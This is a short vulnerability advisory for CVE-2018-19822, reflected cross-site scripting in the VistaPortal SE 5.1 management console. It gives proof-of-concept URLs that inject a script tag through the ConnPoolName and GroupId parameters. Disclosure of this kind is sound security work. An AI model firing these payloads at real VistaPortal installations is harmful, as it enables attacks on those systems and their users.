    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19822  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/SharedCriteria.jsp" has reflected XSS via  
    ConnPoolName and GroupId parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U  
    http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4  
    '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=U  
    Vulnerable parameter: ConnPoolName and GroupId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    

    Source: packetstormsecurity.com

Log in to reply